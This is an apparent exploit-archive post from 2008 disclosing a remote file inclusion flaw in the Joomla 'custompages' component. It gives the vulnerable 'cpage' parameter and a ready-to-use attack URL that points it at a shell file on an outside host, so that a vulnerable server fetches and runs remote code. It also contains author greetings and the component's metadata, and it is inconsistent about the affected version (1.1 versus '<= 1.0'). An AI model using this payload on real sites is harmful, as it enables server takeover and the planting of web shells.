Joomla Components custompages 1.1 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Components custompages 1.1 Remote File Inclusion Vulnerability
# Published : 2008-03-22
# Author : Sniper456
# Previous Title : Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability
# Next Title : PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit

@ JOOmla Component custompages <= 1.0 Sql Remote file Inclusion


Author:Sniper456

Contact:Sniper456[attt]gmail.com

Greetss: My chilean people

Developer: Shawn Sandy

License:Other open source / Free license

Dork: 8=====B !           =)

**Bug:

http://www.target.com/index.php?option=com_custompages&cpage=URL

**Example

http://www.target.com/index.php?option=com_custompages&cpage=http://atackweeb.cl/colocoloshell.txt?

side note:

 <name>custompages</name>
 <creationDate>06/11/2006</creationDate>
 <author>Shawn Sandy</author>
 <copyright>Copyright 2006 - Shawn Sandy</copyright>
 <license>License</license>
 <authorEmail>shawnsandy04@gmail.com</authorEmail>
 <authorUrl>www.sstreamtv.com</authorUrl>
 <version>1.1</version>

# www.Syue.com [2008-03-22]